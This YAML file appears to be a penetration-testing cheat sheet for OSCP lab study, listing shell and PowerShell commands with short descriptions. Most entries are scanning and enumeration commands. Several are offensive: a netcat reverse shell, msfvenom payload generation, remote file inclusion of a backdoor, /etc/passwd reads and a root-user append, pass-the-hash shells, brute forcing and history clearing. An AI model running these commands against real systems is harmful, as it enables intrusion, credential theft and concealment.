Files
fms/data/commands.yaml
2026-01-11 22:56:58 +01:00

2936 lines
114 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
title: Commands for Fast Memo Shell
commands:
- cmd: nmap -p- --min-rate 10000 192.168.56.30 -Pn
lang: sh
tags: OSCP
desc: Fast scan all ports
- cmd: nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,5986,9389,49668,49670,49671,49673,49674,49687,49750 -sCV 192.168.56.30 -Pn
lang: sh
tags: OSCP
desc: Scan with services and versions
- cmd: sudo nmap -v -p- -sS -sV -A -T5 192.168.1.1
lang: sh
tags: OSCP
desc: Syn TCP scan all ports with fingerprint, with fastest timming and verbose output
- cmd: grc nmap -v -p- -sV -A --min-rate 10000 --max-rtt-timeout 1500ms 192.168.229.201
lang: sh
tags: OSCP
desc: TCP scan all ports with fingerprint fast with colors
- cmd: sudo nmap -sU -sV -A 192.168.203.199
lang: sh
tags: OSCP
desc: UDP scan
- cmd: nmap -O -sV -A 192.168.203.199
lang: sh
tags: OSCP
desc: TCP scan with OS fingerprint
- cmd: nmap -p- -sV -A --script "vuln" 192.168.213.188
lang: sh
tags: OSCP
desc: TCP scan all ports and check for vuln
- cmd: nmap -sV -p 80,443 --script "vuln" 192.168.50.124
lang: sh
tags: OSCP
desc: TCP scan HTTP/S and check for vuln
- cmd: nmap -p80,443 --script http-title 192.168.218.0/24 --open -Pn
lang: sh
tags: OSCP
desc: TCP scan HTTP/S and get page titles
- cmd: nmap -sT -A --top-ports=20 192.168.50.1-253 -oG top-port-sweep.txt
lang: sh
tags: OSCP
desc: TCP connect scan for the top 20 TCP ports
- cmd: nmap --script http-headers 192.168.50.6
lang: sh
tags: OSCP
desc: scan and check headers with NSE scripts
- cmd: nmap --script-help http-headers
lang: sh
tags: OSCP
desc: get help about a NSE script
- cmd: rustscan --ulimit 5000 -a 10.129.102.178 -- -sV
lang: sh
tags: OSCP
desc: fast scan top ports with nmap service version
- cmd: rustscan --ulimit 5000 -a 10.129.102.178 -- -A -sC -sV
lang: sh
tags: OSCP
desc: fast scan top ports with nmap scripts
- cmd: rustscan --ulimit 5000 -a 10.129.102.178
lang: sh
tags: OSCP
desc: fast scan top ports
- cmd: rustscan --ulimit 5000 -r 1-65535 -a 10.129.102.178
lang: sh
tags: OSCP
desc: fast scan all ports
- cmd: naabu -host 192.168.214.149
lang: sh
tags: OSCP
desc: fast scan a host
- cmd: naabu -nmap-cli 'nmap -sV' -host 192.168.214.149
lang: sh
tags: OSCP
desc: fast scan a host and nmap service discovery
- cmd: naabu -nmap-cli 'nmap -sV -sC' -host 192.168.214.149
lang: sh
tags: OSCP
desc: fast scan a host and nmap service discovery and scripts
- cmd: naabu -nmap-cli 'nmap -sV -sC' -port 1-65535 -host 192.168.214.149
lang: sh
tags: OSCP
desc: fast scan a host of all ports
- cmd: naabu -nmap-cli 'nmap -sV -sC' -l ip_lists
lang: sh
tags: OSCP
desc: fast scan a list of hosts
- cmd: naabu -proxy 127.0.0.1:1080 -Pn -host 10.10.104.146
lang: sh
tags: OSCP
desc: scan using proxy socks
- cmd: Invoke-WebRequest -Proxy "http://192.168.197.224:3128" -uri http://192.168.197.224:8000 -outfile test
lang: ps1
tags: OSCP
desc: using proxy on windows
- cmd: find /usr/share/nmap/scripts/ -type f | sk --preview 'bat -l lua --color=always {}'
lang: sh
tags: OSCP
desc: search a NSE script
- cmd: nc -nvv -w 1 -z 192.168.50.152 3388-3390
lang: sh
tags: OSCP
desc: TCP scan without nmap
- cmd: nc -nv -u -z -w 1 192.168.50.149 120-123
lang: sh
tags: OSCP
desc: UDP scan without nmap
- cmd: nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152
lang: sh
tags: OSCP
desc: SMB scan with info
- cmd: nmap -p 445 --script smb-os-discovery 192.168.212.0/24 --open -oG a; cat a | grep open | cut -d ' ' -f2 | tail -n +2 | xargs -I{} enum4linux {}
lang: sh
tags: OSCP
desc: SMB scan with info ip range
- cmd: sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt
lang: sh
tags: OSCP
desc: UDP scan ip range
- cmd: gobuster dir -u http://<IP|HOST>/ -w /usr/share/wordlists/dirb/common.txt -t 5
lang: sh
tags: OSCP
desc: enumerate pages on webserver
- cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://192.168.232.221/ -f
lang: sh
tags: OSCP
desc: bruteforce directory on webserver
- cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -u http://192.168.232.221/ -x txt,html,php,asp,aspx,jsp
lang: sh
tags: OSCP
desc: bruteforce files on webserver
- cmd: feroxbuster --url http://<IP|Host>/
lang: sh
tags: OSCP
desc: enumerate pages on webserver
- cmd: feroxbuster --url http://<IP|Host>/ -x pdf,php,txt
lang: sh
tags: OSCP
desc: enumerate pages on webserver (check for pdf, php, txt files)
- cmd: feroxbuster --url http://192.168.222.46 -w /usr/share/wordlists/dirb/common.txt
lang: sh
tags: OSCP
desc: enumerate pages on webserver using common list
- cmd: feroxbuster --url http://192.168.193.46/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
lang: sh
tags: OSCP
desc: enumerate pages on webserver using very big list
- cmd: ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://192.168.240.46/FUZZ
lang: sh
tags: OSCP
desc: enumerate pages on webserver
- cmd: ffuf -w pins -u "http://10.129.95.191/cdn-cgi/login/admin.php?content=uploads" -b "user=FUZZ2; role=guest" -mc 200
lang: sh
tags: OSCP
desc: Fuzz cookie value (bruteforce)
- cmd: gobuster vhost -u http://<remote_ip> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
lang: sh
tags: OSCP
desc: discover vhost (virtual host)
- cmd: wfuzz -c -f sub-fighter -u '<url>' -H 'Host:FUZZ.<domain>' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
lang: sh
tags: OSCP
desc: discover vhost (virtual host)
- cmd: wfuzz -c -f sub-fighter -u '<url>' -H 'Host:FUZZ.<domain>' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw <word_to_hide>
lang: sh
tags: OSCP
desc: discover vhost (virtual host), get rid of non-existent false positives
- cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -u http://192.168.1.10:8000/ [-f]
lang: sh
tags: OSCP
desc: discover directories
- cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://192.168.1.10:8000/architecture/
lang: sh
tags: OSCP
desc: discover commons files
- cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_words.txt -u http://192.168.1.10:8000/architecture/ -x txt,html,php,asp,aspx,jsp
lang: sh
tags: OSCP
desc: discover files using extensions
- cmd: ~/hs/tools/enum4linux-ng.py 192.168.194.10
lang: sh
tags: OSCP
desc: SMB enumeration
- cmd: rpcclient -U "MINILAB\\" 192.168.56.30 -N
lang: sh
tags: OSCP
desc: RPC enumeration (enumdomusers, enumdomgroups)
- cmd: net rpc group members 'Domain Users' -W 'MINILAB' -I '192.168.56.30' -U '%'
lang: sh
tags: OSCP
desc: Get all domain users
- cmd: nmap -Pn -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='minilab',userdb=/usr/share/seclists/Usernames/Names/names.txt" 192.168.56.30
lang: sh
tags: OSCP
desc: Get all domain users, when anonymous sessions are not allowed
- cmd: smbmap -H 192.168.229.210
lang: sh
tags: OSCP
desc: SMB list all shares with available permissions
- cmd: netexec smb 192.168.56.30
lang: sh
tags: OSCP
desc: check SMB access
- cmd: netexec smb 192.168.56.30 -u bob -p 'superman'
lang: sh
tags: OSCP
desc: check SMB access with creds
- cmd: netexec smb 192.168.56.30 -u bob -p 'superman' --shares
lang: sh
tags: OSCP
desc: check SMB shares with creds
- cmd: netexec smb 192.168.56.30 -u bob -p 'superman' -M spider_plus
lang: sh
tags: OSCP
desc: check SMB shares with creds and try to find interesting files
- cmd: crackmapexec smb 192.168.56.30 -u 'a' -p '' --shares
lang: sh
tags: OSCP
desc: list guest access on shares
- cmd: smbclient --no-pass -L //192.168.194.10
lang: sh
tags: OSCP
desc: list unprotected SMB shares
- cmd: smbclient --no-pass //192.168.194.10/offsec
lang: sh
tags: OSCP
desc: list under unprotected SMB share
- cmd: smbclient //192.168.50.195/share -c 'put config.Library-ms'
lang: sh
tags: oscp
desc: Uploading our Library file to the SMB share on the HR137 machine
- cmd: smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
lang: sh
tags: OSCP
desc: Using smbclient with NTLM hash
- cmd: smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b ; dir ; get secrets.txt
lang: ps1
tags: oscp
desc: Using smbclient with NTLM hash
- cmd: smbmap -u WEB02\mark -p OathDeeplyReprieve91 -H 192.168.246.248
lang: sh
tags: OSCP
desc: SMB list all shares with available permissions
- cmd: impacket-smbclient WEB02\mark@192.168.246.248 [-hashes LMHASH:NTHASH]
lang: sh
tags: OSCP
desc: connect to smb share
- cmd: smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234
lang: sh
tags: oscp
desc: Listing SMB shares through the SSH local port forward running on CONFLUENCE01.
- cmd: smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234 ; ls ; get Provisioning.ps1
lang: sh
tags: oscp
desc: Listing files in the scripts share, using smbclient over our SSH local port forward running on CONFLUENCE01.
- cmd: proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
lang: sh
tags: oscp
desc: smbclient connecting to HRSHARES through the SOCKS proxy using Proxychains.
- cmd: smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
lang: sh
tags: oscp
desc: Connecting to the SMB share on HRSHARES, without any explicit forwarding.
- cmd: smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234
lang: sh
tags: oscp
desc: Connecting to HRSHARES's SMB server through the dnscat2 port forward.
- cmd: sudo mount -t cifs //192.168.194.10/offsec /mnt/smb
lang: sh
tags: OSCP
desc: mount a SMB share
- cmd: sudo mount -t cifs //192.168.1.1/USB1 /mnt/livebox/ -o username=guest,password="",vers=1.0
lang: sh
tags: OSCP
desc: mount a SMB share (guest)
- cmd: snmp-check 192.168.212.151
lang: sh
tags: OSCP
desc: SNMP enumeration
- cmd: snmpwalk -Oa -c public -v1 -t 10 192.168.212.151
lang: sh
tags: OSCP
desc: SNMP enumeration
- cmd: echo -e "public\nprivate\nmanager" > community
lang: sh
tags: OSCP
desc: SNMP enumeration generate community file
- cmd: for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
lang: sh
tags: OSCP
desc: SNMP enumeration generate ip list file
- cmd: onesixtyone -c community -i ips
lang: sh
tags: OSCP
desc: SNMP enumeration
- cmd: snmpwalk -c public -v1 -t 10 192.168.50.151
lang: sh
tags: OSCP
desc: SNMP enumeration
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25
lang: sh
tags: OSCP
desc: SNMP enumeration list entire MIB tree
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2
lang: sh
tags: OSCP
desc: SNMP enumeration list all the currently running processes
- cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3
lang: sh
tags: OSCP
desc: SNMP enumeration list all the current TCP listening ports
- cmd: snmpwalk -c public -v1 -t 10 192.168.244.149 NET-SNMP-EXTEND-MIB::nsExtendObjects
lang: sh
tags: OSCP
desc: SNMP enumeration of Extending Services
- cmd: apt-get install snmp-mibs-downloader; download-mibs
lang: sh
tags: OSCP
desc: update some MIBs to the latest version or to download extra vendor MIBs.
- cmd: impacket-mssqlclient -port 1433 -windows-auth ARCHETYPE/sql_svc:M3g4c0rp123@10.129.129.69
lang: sh
tags: OSCP
desc: connect to a MSSQL Server
- cmd: curl "http://192.168.50.16/cgi-bin/../../../../etc/passwd"
lang: sh
tags: OSCP
desc: check Directory Traversals
- cmd: curl "http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
lang: sh
tags: OSCP
desc: check Directory Traversals
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd"
lang: sh
tags: OSCP
desc: check Directory Traversals
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log"
lang: sh
tags: OSCP
desc: check Local File Inclusion
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php"
lang: sh
tags: OSCP
desc: check Local File Inclusion with PHP Wrappers
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php"
lang: sh
tags: OSCP
desc: check Local File Inclusion with PHP Wrappers
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
lang: sh
tags: OSCP
desc: check Local File Inclusion with PHP Wrappers
- cmd: curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"
lang: sh
tags: OSCP
desc: check Remote File Inclusion
- cmd: remmina -c rdp://username@server
lang: sh
tags: OSCP
desc: connect to a remote desktop in RDP
- cmd: nc -nvlp 4444
lang: sh
tags: OSCP reverse-shell
desc: Bind netcat for reverse shell
- cmd: rlwrap -cAr nc -lnvp 443
lang: sh
tags: OSCP
desc: Bind netcat for reverse shell with completion
- cmd: source ~/.virtualenvs/wsgidav/bin/activate
lang: sh
tags: COMMON
desc: use a python venv
- cmd: ~/hs/tools/powershell_base64_enc.sh
lang: sh
tags: OSCP
desc: encode a powershel payload in base64
- cmd: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.157 4444 >/tmp/f
lang: sh
tags: OSCP reverse-shell
desc: bash reverse shell payload
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.165 LPORT=4445 -f exe-service > a.exe
lang: sh
tags: OSCP reverse-shell
desc: generate a windows service executable reverse shell
- cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.165 LPORT=4445 -f exe > a.exe
lang: sh
tags: OSCP reverse-shell
desc: generate a windows executable reverse shell
- cmd: msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.45.204;set LPORT 443;run;"
lang: sh
tags: OSCP reverse-shell
desc: launch a meterpreter listener
- cmd: curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive
lang: sh
tags: OSCP
desc: Command injection POST command as data
- cmd: curl -s https://http.kali.org/README.mirrorlist | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep 'README$' | sort | uniq | xargs dirname | xargs -I {} sh -c 'echo $(curl -r 0-102400 -s -w %{speed_download} -o /dev/null {}/dists/kali-rolling/Contents-amd64.gz) {}' | sort -g -r
lang: sh
tags: OSCP
desc: List kali mirrors and speed sorted
- cmd: exiftool -a -u old.pdf
lang: sh
tags: OSCP
desc: Print all metadata from a file
- cmd: mysql -u root -p'root' -h 192.168.50.16 -P 3306
lang: sh
tags: COMMON
desc: connect to mysql
- cmd: chezmoi git pull -- --autostash --rebase && chezmoi diff
lang: sh
tags: COMMON
desc: Pull the latest changes from your repo and see what would change, without actually applying the changes
- cmd: sudo setcap 'cap_net_bind_service=+ep' /usr/bin/python3.11
lang: sh
tags: COMMON
desc: Allow bind for port < 1024, set capability CAP_NET_BIND_SERVICE
- cmd: /usr/bin/impacket-smbserver -smb2support share `pwd`
lang: sh
tags: OSCP CUSTOM
desc: 'share directory using SMB protocol, client cmd: net use z: \\ip\share'
- cmd: responder -I tap0
lang: sh
tags: OSCP
desc: launch responder on interface tap0
- cmd: sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
lang: sh
tags: OSCP
desc: use post.txt request file, "item" vulnerable item, with a custom writable dir
- cmd: sqlmap --flush-sessiony
lang: sh
tags: OSCP
desc: remove the previous session
- cmd: sudo grc tcpdump -l -n -i tun0 "dst net 192.168.45.152 && ((tcp[tcpflags] & (tcp-syn) != 0) || not tcp )"
lang: sh
tags: OSCP
desc: dump connection to current host (troubleshooting reverse shell)
- cmd: sudo grc tcpdump -X -vvv -l -n -i tun0 "dst net 192.168.45.152 && ((tcp[tcpflags] & (tcp-syn) != 0) || not tcp )"
lang: sh
tags: OSCP
desc: dump connection to current host with details (troubleshooting reverse shell)
- cmd: msfdb init
lang: sh
tags: OSCP
desc: init metasploit database
- cmd: hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force
lang: sh
tags: OSCP
desc: crack password using rules
- cmd: john --wordlist=ssh.passwords --rules=sshRules ssh.hash
lang: sh
tags: OSCP
desc: bruteForce Hash with John
- cmd: john --wordlist=/usr/share/wordlists/rockyou.txt --rules=sshRules -stdout > passwords.txt
lang: sh
tags: OSCP
desc: generate wordlist
- cmd: hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
lang: sh
tags: OSCP
desc: bruteForce NTLM hash
- cmd: hashcat --help | grep -i "ntlm"
lang: sh
tags: OSCP
desc: search for hashcat hash code
- cmd: hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
lang: sh
tags: OSCP
desc: bruteForce Net-NTLMv2 hash
- cmd: hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
lang: sh
tags: OSCP
desc: bruteforce SSH
- cmd: hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#"
lang: sh
tags: OSCP
desc: bruteforce RDP
- cmd: hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.221.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Invalid username or password"
lang: sh
tags: OSCP
desc: bruteforce HTTP post
- cmd: hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.221.201 http-get /
lang: sh
tags: OSCP
desc: bruteforce HTTP auth basic
- cmd: legba ssh -T 192.168.195.153 -U usernames.txt -P passwords.txt
lang: sh
tags: OSCP
desc: bruteforce SSH
- cmd: legba rdp -T 192.168.244.191 -U users -P passwords
lang: sh
tags: OSCP
desc: bruteforce RDP
- cmd: nslookup mail.megacorptwo.com
lang: ps1
tags: OSCP windows
desc: request DNS
- cmd: nslookup -type=TXT info.megacorptwo.com 192.168.50.151
lang: sh
tags: OSCP
desc: request DNS sepecific type and resolver
- cmd: gobuster dir -u http://192.168.238.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern
lang: sh
tags: OSCP
desc: Enumerate API (pattern contain "v1 \n v2")
- cmd: echo 'MS01.oscp.exam' | gobuster vhost -w - -u http://192.168.194.147:8080
lang: sh
tags: OSCP
desc: Check if vhost exist
- cmd: curl -A '' -H 'Host:<domain>' http://<IP>
lang: sh
tags: OSCP
desc: Check if vhost exist
- cmd: find / -user root -perm -002 -type f -not -path "/proc/*" 2>/dev/null
lang: sh
tags: OSCP
desc: find root writables files
- cmd: routel
lang: sh
tags: OSCP
desc: list all routes
- cmd: ss -anp
lang: sh
tags: OSCP
desc: list all sockets
- cmd: ls -lah /etc/cron*
lang: sh
tags: OSCP
desc: list cron files
- cmd: find / -perm -u=s -type f 2>/dev/null
lang: sh
tags: OSCP
desc: find suid files
- cmd: grep "CRON" /var/log/syslog
lang: sh
tags: OSCP
desc: get cron logs
- cmd: echo "root2:$(openssl passwd w00t):0:0:root:/root:/bin/bash" >> /etc/passwd
lang: sh
tags: OSCP
desc: add a user root2 with password w00t
- cmd: /usr/sbin/getcap -r / 2>/dev/null
lang: sh
tags: OSCP
desc: recursive search / for binaries with capabilities.
- cmd: whatweb http://192.168.203.48/
lang: sh
tags: OSCP
desc: check server and framework used by a website
- cmd: searchsploit "HTML Injection exploit WebCT"
lang: sh
tags: OSCP
desc: search a exploit
- cmd: searchsploit -m <ID>
lang: sh
tags: OSCP
desc: download a exploit
- cmd: impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b
lang: sh
tags: OSCP
desc: Using psexec to get an interactive shell
- cmd: impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b
lang: sh
tags: OSCP
desc: Using wmiexec to get an interactive shell
- cmd: xfreerdp /u:stephanie /d:corp.com /p:'LegmanTeamBenzoin!!' /cert-ignore /v:192.168.197.75 +clipboard /dynamic-resolution /drive:~/vmshare,vmshare
lang: sh
tags: OSCP
desc: connect to rdp
- cmd: xfreerdp /u:offsec /p:'lab' /cert-ignore /v:192.168.197.75 +clipboard /dynamic-resolution
lang: sh
tags: OSCP
desc: connect to rdp
- cmd: swaks --from administrator@supermagicorg.com --to dave.wizard@supermagicorg.com --server 192.168.194.199:587 --auth-user test@supermagicorg.com --auth-pass test --body @msg.txt --attach @config.Library-ms
lang: sh
tags: OSCP
desc: send a email
- cmd: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/oscp/webdav/
lang: sh
tags: OSCP
desc: launch webdav server
- cmd: socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432
lang: sh
tags: OSCP
desc: redirect a port and debug
- cmd: socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22
lang: sh
tags: OSCP
desc: redirect a port
- cmd: python3 -c 'import pty; pty.spawn("/bin/bash")'
lang: sh
tags: OSCP
desc: enable console ssh interaction in netcat shell
- cmd: plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4
lang: ps1
tags: OSCP Windows
desc: port redirect using plink
- cmd: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.232.64 connectport=22 connectaddress=10.4.232.215
lang: ps1
tags: OSCP
desc: add port redirect using netsh
- cmd: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.232.64 localport=2222 action=allow
lang: sh
tags: OSCP
desc: add firewall rule using netsh
- cmd: netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
lang: sh
tags: OSCP
desc: delete firewall rule using netsh
- cmd: netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.232.64
lang: sh
tags: OSCP
desc: delete port redirect using netsh
- cmd: 'alias issh=ssh -o LogLevel=ERROR -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no"'
lang: sh
tags: OSCP
desc: SSH without fingerprint
- cmd: powershell -ep bypass
lang: ps1
tags: OSCP Windows winsetup
desc: bypass the execution policy
- cmd: icacls <filename>
lang: ps1
tags: OSCP Windows
desc: discretionary access control lists (DACLs) on specified files
- cmd: whoami
lang: ps1
tags: OSCP Windows
desc: obtain username and hostname
- cmd: whoami /groups
lang: ps1
tags: OSCP Windows
desc: Group memberships of the user
- cmd: Get-LocalUser
lang: ps1
tags: OSCP Windows
desc: Display local users (depuis powershell)
- cmd: Get-LocalGroup
lang: ps1
tags: OSCP Windows
desc: Display local groups (depuis powershell)
- cmd: Get-LocalGroupMember adminteam
lang: ps1
tags: OSCP Windows
desc: Display members of the group
- cmd: systeminfo
lang: ps1
tags: OSCP Windows
desc: Information about the operating system and architecture
- cmd: ipconfig /all
lang: ps1
tags: OSCP Windows
desc: Information about the network configuration
- cmd: netstat -ano
lang: ps1
tags: OSCP Windows
desc: Active network connections
- cmd: Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
lang: ps1
tags: OSCP Windows
desc: Installed applications
- cmd: Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
lang: ps1
tags: OSCP
desc: Installed applications
- cmd: Get-Process
lang: ps1
tags: OSCP
desc: Running processes
- cmd: Get-Process | Select-Object -ExpandProperty Path
lang: ps1
tags: OSCP
desc: Running processes with path
- cmd: Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
lang: ps1
tags: OSCP
desc: Find in powershell
- cmd: Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
lang: ps1
tags: OSCP
desc: Find in powershell
- cmd: dir -Recurse | Select-String -pattern "steve"
lang: ps1
tags: OSCP
desc: recusrive grep
- cmd: net user steve
lang: ps1
tags: OSCP
desc: Get info about account
- cmd: Get-History
lang: ps1
tags: OSCP
desc: Get powershell history commands
- cmd: Clear-History
lang: ps1
tags: OSCP
desc: Clear powershell history commands
- cmd: (Get-PSReadlineOption).HistorySavePath
lang: ps1
tags: OSCP
desc: Display path of the history file from PSReadline (then type <filename> to read)
- cmd: eventvwr
lang: ps1
tags: OSCP
desc: Launch event viewer
- cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
lang: ps1
tags: OSCP
desc: List of services with binary path
- cmd: Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
lang: ps1
tags: OSCP
desc: Obtain Startup Type for mysql service
- cmd: whoami /priv
lang: ps1
tags: OSCP
desc: Checking for reboot privileges
- cmd: shutdown /r /t 0
lang: ps1
tags: OSCP
desc: Reboot
- cmd: Restart-Service BetaService
lang: ps1
tags: OSCP
desc: Restarting BetaService
- cmd: $env:path
lang: ps1
tags: OSCP
desc: Display the PATH environment variable
- cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName
lang: ps1
tags: OSCP
desc: List of services with binary path
- cmd: wmic service get name,pathname | findstr .. (look in courses)
lang: ps1
tags: OSCP
desc: List of services with spaces and missing quotes in the binary path
- cmd: schtasks /query /fo LIST /v
lang: ps1
tags: OSCP
desc: list scheduled tasks
- cmd: vim --clean
lang: sh
tags: COMMON
desc: launch vim without options and config files
- cmd: git --git-dir=~/fms/.git --work-tree=~/fms pull
lang: sh
tags: COMMON
desc: git command (pull) with directory as params
- cmd: pandoc -f epub -t markdown_strict -o hacktricks.md hacktricks.epub
lang: sh
tags: COMMON
desc: convert files from format to another, here epub to markdown
- cmd: grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}"
lang: sh
tags: COMMON
desc: grep ip address
- cmd: grep -E -o "[[:alnum:]]{30,34}"
lang: sh
tags: COMMON
desc: grep NTLM hash
- cmd: mitmproxy --set console_mouse=false --set anticache -p 8080
lang: sh
tags: COMMON
desc: launch mitmproxy with options
- cmd: mitmproxy --set console_mouse=false --set anticache -p 8080 -s ~/hs/mitmproxy/req_hook.py
lang: sh
tags: COMMON
desc: launch mitmproxy with options and hook
- cmd: mitmproxy --set console_mouse=false --set anticache -p 8080 --mode upstream:http://127.0.0.1:8888
lang: sh
tags: COMMON
desc: launch mitmproxy with upstream proxy
- cmd: find / -xdev -type f \( -exec grep -xq "{}" /var/lib/dpkg/info/*.list \; -or -print \)
lang: sh
tags: COMMON
desc: search for files not owned by any package
- cmd: secret-tool search key password
lang: sh
tags: COMMON
desc: search password saved in gnome keyring
- cmd: Set-WinUserLanguageList -Force 'fr-FR'
lang: ps1
tags: COMMON powershell winsetup
desc: change Keyboard Layout in French
- cmd: Test-NetConnection -Port 445 192.168.50.151
lang: ps1
tags: OSCP powershell
desc: Check for TCP port open
- cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null
lang: ps1
tags: OSCP powershell
desc: TCP scan port
- cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).ConnectAsync("192.168.50.151", $_).Wait(100)) "TCP port $_ is open"} 2>$null
lang: ps1
tags: OSCP powershell
desc: TCP scan port display only open
- cmd: '(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell'
lang: ps1
tags: OSCP powershell windows cmd.exe
desc: check the current shell
- cmd: powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe
lang: ps1
tags: OSCP powershell windows cmd.exe
desc: download a file
- cmd: net view \\dc01 /all
lang: ps1
tags: OSCP windows cmd.exe
desc: Show SMB share
- cmd: ls -l /usr/share/metasploit-framework/scripts/resource
lang: sh
tags: OSCP
desc: list Meterpreter autoscript examples
- cmd: net user jeffadmin /domain
lang: ps1
tags: OSCP powershell windows cmd.exe
desc: get information about a user and domain
- cmd: net group /domain
lang: ps1
tags: OSCP powershell windows cmd.exe
desc: output includes a long list of groups in the domain
- cmd: net group "sales department" /domain
lang: ps1
tags: oscp powershell windows cmd.exe
desc: enumerate the group members
- cmd: cd c:\Tools
lang: ps1
tags: oscp powershell windows winsetup
desc: go to tools directory
- cmd: Import-Module .\PowerView.ps1
lang: ps1
tags: oscp powershell windows winsetup
desc: import the module PowerView
- cmd: Import-Module .\Sharphound.ps1
lang: ps1
tags: oscp powershell windows winsetup
desc: import the module SharpHound
- cmd: Get-NetDomain
lang: ps1
tags: oscp powershell windows PowerView
desc: get basic information about the domain
- cmd: Get-NetUser
lang: ps1
tags: oscp powershell windows PowerView
desc: get a list of all users in the domain
- cmd: Get-NetUser | select cn,pwdlastset,lastlogon
lang: ps1
tags: oscp powershell windows PowerView
desc: get a list of all users in the domain and pipe output to select only attributes
- cmd: Get-NetGroup | select cn
lang: ps1
tags: oscp powershell windows PowerView
desc: enumerate groups and pipe output to select only attributes
- cmd: Get-NetGroup "Sales Department" | select member
lang: ps1
tags: oscp powershell windows PowerView
desc: investigate the Sales Department using Get-NetGroup and pipe the output into select member
